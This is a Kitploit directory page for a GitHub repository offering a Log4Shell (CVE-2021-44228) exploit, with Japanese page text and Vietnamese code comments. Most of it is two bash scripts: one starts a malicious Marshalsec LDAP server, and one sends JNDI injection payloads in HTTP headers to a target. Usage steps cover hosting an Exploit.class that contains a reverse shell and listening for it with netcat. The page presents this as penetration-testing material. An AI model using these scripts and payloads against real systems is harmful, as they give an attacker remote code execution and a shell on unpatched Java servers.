Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/khaidtraivch/cve-2021-44228-log4shell-
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセスツール
GitHubkhaidtraivch/cve-2021-44228-log4shell-

CVE-2021-44228-Log4Shell-

Kiểm thử xâm nhập

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
111年前未レビュー

CVE-2021-44228-Log4Shell-

侵入テスト

  1. 悪意のあるLDAPサーバーの作成 (Marshalsec使用)
#!/bin/bash
# Script: start_ldap_server.sh
# Yêu cầu: Cài đặt Java và Marshalsec (https://github.com/mbechler/marshalsec)

LDAP_PORT="1389"
HTTP_PORT="8000"
ATTACKER_IP="192.168.0.101"
REVERSE_PORT="5555"

echo "[+] Khởi động LDAP server độc hại trên port $LDAP_PORT..."
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer \
  "http://$ATTACKER_IP:$HTTP_PORT/#Exploit" $LDAP_PORT
  1. 侵害されたWebサーバーからLog4Shellペイロードを送信
#!/bin/bash
# Script: exploit_log4shell.sh
# Mục tiêu: Gửi payload JNDI đến máy trạm Windows

TARGET_IP="192.168.1.10"
ATTACKER_IP="192.168.0.101"
LDAP_PORT="1389"

echo "[+] Gửi payload Log4Shell đến $TARGET_IP..."
curl -X GET \
  "http://$TARGET_IP" \
  -H "User-Agent: \${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}" \
  -H "X-Api-Version: \${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"

使用方法

LDAPサーバーを起動:

./start_ldap_server.sh

HTTPサーバーを実行してExploit.classファイルをホスト (リバースシェルを含む):

python3 -m http.server 8000

侵害されたWebサーバーからペイロードを送信

./exploit_log4shell.sh

攻撃マシンでリバースシェルを待ち受け:

nc -lvnp 5555

ツールをダウンロード